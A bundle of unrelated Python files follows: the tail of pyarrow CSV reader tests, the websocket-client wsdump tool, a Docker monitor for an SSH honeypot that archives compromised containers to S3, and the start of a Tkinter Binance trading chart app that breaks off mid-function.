convert_options = ConvertOptions()
convert_options.column_types = {"a": pa.int32(), "d": pa.int32()}
# Test without skip_rows and column names in the csv
csv_bad_columns = csv + b"1,2\r\n"
with pytest.raises(pa.ArrowInvalid,
match="Row #102: Expected 4 columns, got 2"):
self.read_bytes(csv_bad_columns, read_options=read_options,
convert_options=convert_options)
csv_bad_type = csv + b"a,b,c,d\r\n"
message = ("In CSV column #0: Row #102: " +
"CSV conversion error to int32: invalid value 'a'")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_type, read_options=read_options,
convert_options=convert_options)
long_row = (b"this is a long row" * 15) + b",3\r\n"
csv_bad_columns_long = csv + long_row
message = ("Row #102: Expected 4 columns, got 2: " +
long_row[0:96].decode("utf-8") + " ...")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_columns_long, read_options=read_options,
convert_options=convert_options)
# Test without skip_rows and column names not in the csv
csv, _ = make_random_csv(4, 100, write_names=False)
read_options.column_names = ["a", "b", "c", "d"]
csv_bad_columns = csv + b"1,2\r\n"
with pytest.raises(pa.ArrowInvalid,
match="Row #101: Expected 4 columns, got 2"):
self.read_bytes(csv_bad_columns, read_options=read_options,
convert_options=convert_options)
csv_bad_columns_long = csv + long_row
message = ("Row #101: Expected 4 columns, got 2: " +
long_row[0:96].decode("utf-8") + " ...")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_columns_long, read_options=read_options,
convert_options=convert_options)
csv_bad_type = csv + b"a,b,c,d\r\n"
message = ("In CSV column #0: Row #101: " +
"CSV conversion error to int32: invalid value 'a'")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_type, read_options=read_options,
convert_options=convert_options)
# Test with skip_rows and column names not in the csv
read_options.skip_rows = 23
with pytest.raises(pa.ArrowInvalid,
match="Row #101: Expected 4 columns, got 2"):
self.read_bytes(csv_bad_columns, read_options=read_options,
convert_options=convert_options)
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_type, read_options=read_options,
convert_options=convert_options)
class TestParallelCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = True
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
class BaseTestStreamingCSVRead:
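    # Tests for the streaming (batch-by-batch) CSV reader; subclasses provide self.open_csv().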
def open_bytes(self, b, **kwargs):
return self.open_csv(pa.py_buffer(b), **kwargs)
def check_reader(self, reader, expected_schema, expected_data):
assert reader.schema == expected_schema
batches = list(reader)
assert len(batches) == len(expected_data)
for batch, expected_batch in zip(batches, expected_data):
batch.validate(full=True)
assert batch.schema == expected_schema
assert batch.to_pydict() == expected_batch
def test_file_object(self):
data = b"a,b\n1,2\n3,4\n"
expected_data = {'a': [1, 3], 'b': [2, 4]}
bio = io.BytesIO(data)
reader = self.open_csv(bio)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
self.check_reader(reader, expected_schema, [expected_data])
def test_header(self):
rows = b"abc,def,gh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('abc', pa.null()),
('def', pa.null()),
('gh', pa.null())])
self.check_reader(reader, expected_schema, [])
def test_inference(self):
# Inference is done on first block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
read_options = ReadOptions()
read_options.block_size = len(rows)
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc', 'gh'],
'b': [b'456', b'de\xff', b'ij']}])
read_options.block_size = len(rows) - 1
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc'],
'b': [b'456', b'de\xff']},
{'a': ['gh'],
'b': [b'ij']}])
def test_inference_failure(self):
# Inference on first block, then conversion failure on second block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
read_options = ReadOptions()
read_options.block_size = len(rows) - 7
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {
'a': [123], 'b': [456]
}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
# Inference on first block, then conversion failure on second block,
# then success on third block
rows = b"a,b\n1,2\nabc,def\n45,67\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# Third block
assert reader.read_next_batch().to_pydict() == {'a': [45], 'b': [67]}
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_invalid_csv(self):
# CSV errors on first block
rows = b"a,b\n1,2,3\n4,5\n6,7\n"
read_options = ReadOptions()
read_options.block_size = 10
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader = self.open_bytes(rows, read_options=read_options)
# CSV errors on second block
rows = b"a,b\n1,2\n3,4,5\n6,7\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader.read_next_batch()
# Cannot continue after a parse error
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a;b', pa.string()),
('c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a;b': ['de'],
'c': ['fg;eh']}])
opts = ParseOptions(delimiter=';')
reader = self.open_bytes(rows, parse_options=opts)
expected_schema = pa.schema([('a', pa.string()),
('b,c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ['de,fg'],
'b,c': ['eh']}])
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
self.check_reader(reader, expected_schema,
[{'a': [1, 4],
'b': [2, 5],
'c': [3, 6]}])
def test_empty_file(self):
with pytest.raises(ValueError, match="Empty CSV file"):
self.open_bytes(b"")
def test_column_options(self):
# With column_names
rows = b"1,2,3\n4,5,6"
read_options = ReadOptions()
read_options.column_names = ['d', 'e', 'f']
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('d', pa.int64()),
('e', pa.int64()),
('f', pa.int64())])
self.check_reader(reader, expected_schema,
[{'d': [1, 4],
'e': [2, 5],
'f': [3, 6]}])
# With include_columns
convert_options = ConvertOptions()
convert_options.include_columns = ['f', 'e']
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.int64())])
self.check_reader(reader, expected_schema,
[{'e': [2, 5],
'f': [3, 6]}])
# With column_types
convert_options.column_types = {'e': pa.string()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'e': ["2", "5"],
'f': [3, 6]}])
# Missing columns in include_columns
convert_options.include_columns = ['g', 'f', 'e']
with pytest.raises(
KeyError,
match="Column 'g' in include_columns does not exist"):
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
convert_options.include_missing_columns = True
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.null()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
convert_options.column_types = {'e': pa.string(), 'g': pa.float64()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.float64()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
def test_encoding(self):
# latin-1 (invalid utf-8)
rows = b"a,b\nun,\xe9l\xe9phant"
read_options = ReadOptions()
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': [b"\xe9l\xe9phant"]}])
read_options.encoding = 'latin1'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
# utf-16
rows = (b'\xff\xfea\x00,\x00b\x00\n\x00u\x00n\x00,'
b'\x00\xe9\x00l\x00\xe9\x00p\x00h\x00a\x00n\x00t\x00')
read_options.encoding = 'utf16'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
reader = self.open_bytes(csv)
table = reader.read_all()
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [19, 21, 23, 26, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
# Need at least two lines for type inference
assert csv[:block_size].count(b'\n') >= 2
read_options = ReadOptions(block_size=block_size)
reader = self.open_bytes(csv, read_options=read_options)
table = reader.read_all()
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
class TestSerialStreamingCSVRead(BaseTestStreamingCSVRead, unittest.TestCase):
def open_csv(self, *args, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
return open_csv(*args, **kwargs)
def test_batch_lifetime(self):
gc.collect()
old_allocated = pa.total_allocated_bytes()
# Memory occupation should not grow with CSV file size
def check_one_batch(reader, expected):
batch = reader.read_next_batch()
assert batch.to_pydict() == expected
rows = b"10,11\n12,13\n14,15\n16,17\n"
read_options = ReadOptions()
read_options.column_names = ['a', 'b']
read_options.block_size = 6
reader = self.open_bytes(rows, read_options=read_options)
check_one_batch(reader, {'a': [10], 'b': [11]})
allocated_after_first_batch = pa.total_allocated_bytes()
check_one_batch(reader, {'a': [12], 'b': [13]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [14], 'b': [15]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [16], 'b': [17]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
with pytest.raises(StopIteration):
reader.read_next_batch()
assert pa.total_allocated_bytes() == old_allocated
reader = None
assert pa.total_allocated_bytes() == old_allocated
class BaseTestCompressedCSVRead:
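    # Tests for reading compressed CSV files from disk; subclasses provide
    # csv_filename and write_file() for a specific codec.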
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix='arrow-csv-test-')
def tearDown(self):
shutil.rmtree(self.tmpdir)
def read_csv(self, csv_path):
try:
return read_csv(csv_path)
except pa.ArrowNotImplementedError as e:
pytest.skip(str(e))
def test_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=100)
csv_path = os.path.join(self.tmpdir, self.csv_filename)
self.write_file(csv_path, csv)
table = self.read_csv(csv_path)
table.validate(full=True)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
class TestGZipCSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.gz"
def write_file(self, path, contents):
with gzip.open(path, 'wb', 3) as f:
f.write(contents)
def test_concatenated(self):
# ARROW-5974
csv_path = os.path.join(self.tmpdir, self.csv_filename)
with gzip.open(csv_path, 'wb', 3) as f:
f.write(b"ab,cd\nef,gh\n")
with gzip.open(csv_path, 'ab', 3) as f:
f.write(b"ij,kl\nmn,op\n")
table = self.read_csv(csv_path)
assert table.to_pydict() == {
'ab': ['ef', 'ij', 'mn'],
'cd': ['gh', 'kl', 'op'],
}
class TestBZ2CSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.bz2"
def write_file(self, path, contents):
with bz2.BZ2File(path, 'w') as f:
f.write(contents)
def test_read_csv_does_not_close_passed_file_handles():
# ARROW-4823
buf = io.BytesIO(b"a,b,c\n1,2,3\n4,5,6")
read_csv(buf)
assert not buf.closed
def test_write_read_round_trip():
t = pa.Table.from_arrays([[1, 2, 3], ["a", "b", "c"]], ["c1", "c2"])
record_batch = t.to_batches(max_chunksize=4)[0]
for data in [t, record_batch]:
# Test with header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=True))
buf.seek(0)
assert t == read_csv(buf)
# Test without header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=False))
buf.seek(0)
read_options = ReadOptions(column_names=t.column_names)
assert t == read_csv(buf, read_options=read_options)
|
wsdump.py
|
#!/Users/josephbell/Desktop/reddit-scraping/reddit-env/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
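    # argparse action for -v: accepts an explicit count (e.g. "-v 2") or counts
    # stacked v's (e.g. "-vv" -> 2).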
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
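    # Reads a line from stdin and normalizes it to UTF-8 bytes on both Python 2 and 3.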
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
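    # Console that prints received messages in blue above the "> " prompt using ANSI escape codes.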
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
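        # Receive a single frame, replying to pings and close frames, and return (opcode, data).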
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
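        # Reader thread: decode (and, if needed, gunzip/inflate) incoming messages and
        # echo them to the console until a close frame arrives.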
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
            if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213':  # gzip magic
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
                except Exception:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
                except Exception:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
monitor.py
|
import sys
import docker
import logging
import threading
import os
import subprocess
import boto3
logging.basicConfig(filename='/var/log/docker_start.log', level=logging.INFO)
threads = []
sc = []
def cleanup(container):
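    # Stop the container, run the external cleanup script, and, if a successful login
    # was seen in its logs, export its filesystem to S3 before removing it.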
container.stop()
_ = subprocess.call(["/usr/local/bin/honey-clean.sh", container.name])
    if container.id in sc:
s3 = boto3.resource('s3')
BUCKET= "honeypot-docker-images"
shell_command = "docker export -o /tmp/" + container.id + ".tar " + container.name
_ = subprocess.call(shell_command.split())
s3.Bucket(BUCKET).upload_file("/tmp/" + container.id + ".tar", container.name + "/" + container.id + ".tar")
os.remove("/tmp/" + container.id + ".tar")
sc.remove(container.id)
container.remove()
def containerTimeout(id, container):
cleanup(container)
def container(cli,id):
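    # Follow the container's log stream: arm a 5-minute kill timer, remember containers
    # that saw a successful password login, and tear the container down when the session ends.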
failed = 0
container = cli.containers.get(id)
# timer to kill the container after 5 minutes
tr = threading.Timer(5 * 60, containerTimeout, [id, container])
tr.start()
logline = []
for line in container.logs(stream=True):
if '\n' in line.decode('utf-8'):
logline = ''.join(logline)
if 'Accepted password for' in line.decode('utf-8'):
sc.append(container.id)
if 'closed' in line.decode('utf-8'):
container.stop()
container.remove()
break
if 'disconnected' in line.decode('utf-8'):
cleanup(container)
break
#logging.info(str(logline + line.decode('utf-8').strip()))
logline = []
else:
            logline.append(line.decode('utf-8'))  # decode so the ''.join(logline) call works on str, not bytes
return
def start(cli, event):
""" handle 'start' events"""
logging.info(event)
t = threading.Thread(target=container, args=(cli,event.get('id'),))
threads.append(t)
t.start()
thismodule = sys.modules[__name__]
# create a docker client object that talks to the local docker daemon
cli = docker.from_env()
#containers = cli.containers.list()
# start listening for new events
events = cli.events(decode=True)
# possible events are:
# attach, commit, copy, create, destroy, die, exec_create, exec_start, export,
# kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
for event in events:
# if a handler for this event is defined, call it
    if hasattr(thismodule, event['Action']):
        getattr(thismodule, event['Action'])(cli, event)
|
iTrader.py
|
from tkinter import *
from tkinter import Menu
from tkinter import ttk
from tkinter.ttk import Combobox
from tkinter import messagebox
import tkinter.font as font
from binance_api import Binance
import threading
import time
import datetime
import os
import os.path
#Main global variables
ep = False
#Button state variables for daemon processes
PS1 = False #Timer button_1 state (Start/Stop) true/false
PS_BU = False #Timer button_2 state (Start/Stop) true/false
PS_AB = False #Timer button_AB state (Start/Stop) true/false
PS_OT = False #Timer button_OrdTmr state (Start/Stop) true/false
Ord_Zm = False #Whether to show the order Zoom chart - button_Ord state (Zoom/Norm) true/false
#Timer state variables for daemon processes
should_run_T = False #Timer TICK start true/false
should_run_C = False #Timer CANDLES start true/false
should_run_S = False #Timer CANDLES SUMM start true/false
should_run_BU = False #Timer BTC/USDT watch start true/false
should_run_AB = False #Timer Account Balances watch start true/false
should_run_OT = False #Timer Order Timer start true/false
should_run_OZ = False #Timer Order Zoom start true/false
TE_Tck = True
TE_Cnd = True
TE_CndSm = True
TE_BU = True
TE_AB = True
TE_Zm = True
TE_OrdTmr = True
#API Keys from Binance
API_KEY_s = ''
API_SECRET_s = ''
bot = Binance(API_KEY='', API_SECRET='')
isAcc = False
sys_msg = ''
yI=0
y0I_TP=0
yM=0
Lo=0
TT0=0
#graph pair param
GS='CANDLE 5m'
grSmb = 'BNBUSDT' #Chart symbol
Lo=0 #Last order number
grSt = 16 #price step on the chart
grZm = 500 #Graph Zoom number
grOW = 1000 #Graph Order Width
prSt = 0.1 #price step
grH = 1 #chart height
grW = 1 #chart width
grMd = 0.5 #half the chart height
NwOrSw=False
#pair param
MS = 'SPOT' #FUTURES or SPOT
MPS = 'USDT'
#symbol param
Lvrg = 1
Lvrg_Tmp = 1
MrgT='NONE'
MrgT_Tmp='NONE'
Isl = True
orLSS=1
#position param
PEP = 0
PSP = 0
PPP = 0
PPP_Tmp = 0
PSP_Tmp = 0
PosSide='LONG'
#Main global variables
#Order variables
yI0Zm = 0 #Current price for OrderZoom
class Timer_Tick:
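    # Worker loop for the tick chart: while running, polls Binance depth and recent
    # trades for the selected symbol and redraws the tick and order-book canvases.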
def __init__(self):
global yI
global Lo
global TE_Tck
while True:
if PS1 == True:
                sys_msg = ' Tick chart ' + grSmb + ' stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = True
break
if should_run_T:
for i in range(400):
if not should_run_T:
                        sys_msg = ' Tick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_T:
if i==0:
                            sys_msg = ' Tick chart ' + grSmb + ' started.'
app.Sys_Msg(text1=sys_msg)
TE_Tck = False
if i > 0:
time.sleep(0.01)
                        #View in a browser: https://api.binance.com/api/v1/depth?symbol=ETHBTC
                        #limit - number of records returned, from 5 to 1000 (default 100).
                        #Allowed values: 5, 10, 20, 50, 100, 500, 1000.
                        #0 can also be passed, but it may return a large amount of data.
                        #The request weight depends on the limit parameter: for limits from 5 to 100 the weight is 1,
                        #for 500 the weight is 5, and for 1000 the weight is 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=50)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
                        #If one side bought and the other sold, is that a buy or a sell?
                        #Answer: in the Binance trade history, trades with isBuyerMaker == false are highlighted green,
                        #and those with isBuyerMaker == true are highlighted magenta.
#sss41 = "BNBUSDT - trades"
if MS=='SPOT':
myTup12 =('trades', bot.trades(symbol=grSmb, limit=20)) #Tupl
myDicGr1 = myTup12[1][19] #dict
elif MS=='FUTURES':
myTup12 = ('FutTrades', bot.futuresTrades(symbol=grSmb, limit=20)) #tupl
myDicGr1 = myTup12[1][19] #dict
#print(myTup12[1][0])
#print(myTup12[1][19])
if i==0:
yI0=float(myDicGr1['price'])
yI=100
app.graph_1.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
#print (TT0)
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(500,grMd)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,grMd + grSt/2,text="%.2f" % (yI0))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.3f" % (yI0))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.4f" % (yI0))
elif prSt < 0.0001:
app.graph_1.create_text(900,grMd + grSt/2,text="%.8f" % (yI0))
yp=-60
ypi=-4
while yp < 1500:
points=[]
yp = 0 + ypi*60
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+ypi*15
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%M:%S")
app.graph_Tb.create_text(0 + ypi*60,10,text=tmm)
app.graph_Td.create_text(0 + ypi*60,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0-ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0-ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0-ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0-ypi*(yI0/400)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/400)/prSt)*grSt
pp=(-500,yp)
points.append(pp)
pp=(500,yp)
points.append(pp)
app.graph_1.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.1 > prSt >= 0.01:
app.graph_1.create_text(900,yp + grSt/2,text="%.2f" % (yI0+ypi*(yI0/400)))
elif 0.01 > prSt >= 0.001:
app.graph_1.create_text(900,yp + grSt/2,text="%.3f" % (yI0+ypi*(yI0/400)))
elif 0.001 > prSt >= 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.4f" % (yI0+ypi*(yI0/400)))
elif prSt < 0.0001:
app.graph_1.create_text(900,yp + grSt/2,text="%.8f" % (yI0+ypi*(yI0/400)))
ypi += 1
for mm in range(len(myTup12[1])):
myDicGr1TT = myTup12[1][mm]
if int(myDicGr1TT['id']) > Lo:
xx=myDicGr1TT['time']
xxp = 20 + ((xx - TT0)/1000)*4
yyp = grMd - ((float(myDicGr1TT['price'])-yI0)/prSt)* grSt
if xxp > 1000:
app.graph_1.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT['quoteQty']) < 100:
x1, y1 = (xxp - 1), (yyp - 1)
x2, y2 = (xxp + 1), (yyp + 1)
elif 100 <= float(myDicGr1TT['quoteQty']) <= 1000:
x1, y1 = (xxp - 2 - 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp -2 - 3*(float(myDicGr1TT['quoteQty'])/1000))
x2, y2 = (xxp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000)), (yyp + 2 + 3*(float(myDicGr1TT['quoteQty'])/1000))
elif 1000 < float(myDicGr1TT['quoteQty']) <= 10000:
x1, y1 = (xxp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp - 5 - 3*(float(myDicGr1TT['quoteQty'])/10000))
x2, y2 = (xxp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000)), (yyp + 5 + 3*(float(myDicGr1TT['quoteQty'])/10000))
elif 10000 < float(myDicGr1TT['quoteQty']) <= 50000:
x1, y1 = (xxp - 8), (yyp - 8)
x2, y2 = (xxp + 8), (yyp + 8)
elif float(myDicGr1TT['quoteQty']) > 50000:
x1, y1 = (xxp - 10), (yyp - 10)
x2, y2 = (xxp + 10), (yyp + 10)
if myDicGr1TT['isBuyerMaker'] == True:
flc = "magenta"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "black"
else:
flc="green"
if float(myDicGr1TT['quoteQty']) > 50000:
flc = "gold"
app.graph_1.create_oval(x1, y1, x2, y2, fill=flc)
#print(x1,x2,y1,y2)
Lo=int(myDicGr1TT['id'])
#Order Book Graph
